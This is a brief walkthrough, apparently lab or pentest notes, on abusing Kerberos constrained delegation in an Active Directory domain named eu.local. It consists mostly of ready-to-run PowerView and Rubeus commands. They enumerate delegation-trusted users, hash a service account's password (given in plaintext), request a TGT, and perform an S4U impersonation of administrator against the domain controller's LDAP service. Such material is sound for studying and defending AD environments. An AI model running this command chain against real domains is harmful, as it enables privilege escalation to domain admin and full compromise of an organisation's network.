Enumerating Users that have Constrained Delegation

Get-DomainUser -TrustedToAuth -Domain eu.local

If we compromised the user storagesvc we can access any service in the EU-DC as any user including Domain Admins users

First, let’s get the hash of the user storagesvc using Rubeus.exe

.\\Rubeus.exe hash /user:storagesvc /domain:eu.local /password:Qwerty@123

Now let’s get TGT as that user

.\\Rubeus.exe asktgt /user:storagesvc /domain:eu.local /aes256:4A0D89D845868AE3DCAB270FE23BEDD442A62C4CAD7034E4C60BEDA3C0F65E04 /ptt

Now let’s validate that we got the ticket

klist

Now let’s Abuse the Constrained Delegation

.\\Rubeus.exe s4u /user:storagesvc /aes256:4A0D89D845868AE3DCAB270FE23BEDD442A62C4CAD7034E4C60BEDA3C0F65E04 /impersonateuser:administrator /msdsspn:TIME/EU-DC.eu.local /altservice:ldap /domain:eu.local /dc:eu-dc.eu.local /nowrap /ptt

Now let’s validate that we got the ticket

klist